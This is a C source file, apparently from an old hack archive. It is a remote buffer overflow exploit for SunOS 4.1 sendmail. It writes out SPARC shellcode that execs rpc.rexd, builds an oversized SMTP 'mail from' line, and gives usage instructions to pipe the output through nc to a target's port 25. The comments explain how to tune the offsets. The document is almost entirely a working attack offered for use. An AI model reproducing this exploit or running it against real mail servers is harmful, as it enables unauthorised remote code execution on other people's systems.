home *** CD-ROM | disk | FTP | other *** search
- /*
- * Overflow for Sunos 4.1 sendmail - execs /usr/etc/rpc.rexd.
- * If you don't know what to do from there, kill yourself.
- * Remote stack pointer is guessed, the offset from it to the code is 188.
- *
- * Use: smrex buffersize padding |nc hostname 25
- *
- * where `padding` is a small integer, 1 works on my sparc 1+
- *
- * I use smrex 84 1, play with the numbers and see what happens. The core
- * gets dumped in /var/spool/mqueue if you fuck up, fire up adb, hit $r and
- * see where your offsets went wrong :)
- *
- * I don't *think* this is the 8lgm syslog() overflow - see how many versions
- * of sendmail this has carried over into and let me know. Or don't, I
- * wouldn't :)
- *
- * P.S. I'm *sure* there are cleverer ways of doing this overflow. So sue
- * me, I'm new to this overflow business..in my day everyone ran YPSERV and
- * things were far simpler... :)
- *
- * The Army of the Twelve Monkeys in '98 - still free, still kicking arse.
- */
-
- #include <stdio.h>
-
- int main(int argc, char **argv)
- {
- long unsigned int large_string[10000];
- int i, prelude;
- unsigned long offset;
- char padding[50];
-
- offset = 188; /* Magic numbers */
- prelude = atoi(argv[1]);
-
- if (argc < 2)
- {
- printf("Usage: %s bufsize <alignment offset> | nc target 25\n",
- argv[0]);
- exit(1);
- }
-
- for (i = 6; i < (6 + atoi(argv[2])); i++)
- {
- strcat(padding, "A");
- }
- for(i = 0; i < prelude; i++)
- {
- large_string[i] = 0xfffffff0; /* Illegal instruction */
- }
-
- large_string[prelude] = 0xf7ffef50; /* Arbitrary overwrite of %fp */
-
- large_string[prelude + 1] = 0xf7fff00c; /* Works for me; address of code */
-
- for( i = (prelude + 2); i < (prelude + 64); i++)
- {
- large_string[i] = 0xa61cc013; /* Lots of sparc NOP's */
- }
-
- /* Now the sparc execve /usr/etc/rpc.rexd code.. */
-
- large_string[prelude + 64] = 0x250bcbc8;
- large_string[prelude + 65] = 0xa414af75;
- large_string[prelude + 66] = 0x271cdc88;
- large_string[prelude + 67] = 0xa614ef65;
- large_string[prelude + 68] = 0x291d18c8;
- large_string[prelude + 69] = 0xa8152f72;
- large_string[prelude + 70] = 0x2b1c18c8;
- large_string[prelude + 71] = 0xaa156e72;
- large_string[prelude + 72] = 0x2d195e19;
- large_string[prelude + 73] = 0x900b800e;
- large_string[prelude + 74] = 0x9203a014;
- large_string[prelude + 75] = 0x941ac00b;
- large_string[prelude + 76] = 0x9c03a104;
- large_string[prelude + 77] = 0xe43bbefc;
- large_string[prelude + 78] = 0xe83bbf04;
- large_string[prelude + 79] = 0xec23bf0c;
- large_string[prelude + 80] = 0xdc23bf10;
- large_string[prelude + 81] = 0xc023bf14;
- large_string[prelude + 82] = 0x8210203b;
- large_string[prelude + 83] = 0xaa103fff;
- large_string[prelude + 84] = 0x91d56001;
- large_string[prelude + 85] = 0xa61cc013;
- large_string[prelude + 86] = 0xa61cc013;
- large_string[prelude + 87] = 0xa61cc013;
- large_string[prelude + 88] = 0;
-
- /* And finally, the overflow..simple, huh? :) */
- printf("helo\n");
- printf("mail from: %s%s\n", padding, large_string);
- }
- /* www.hack.co.za [2000]*/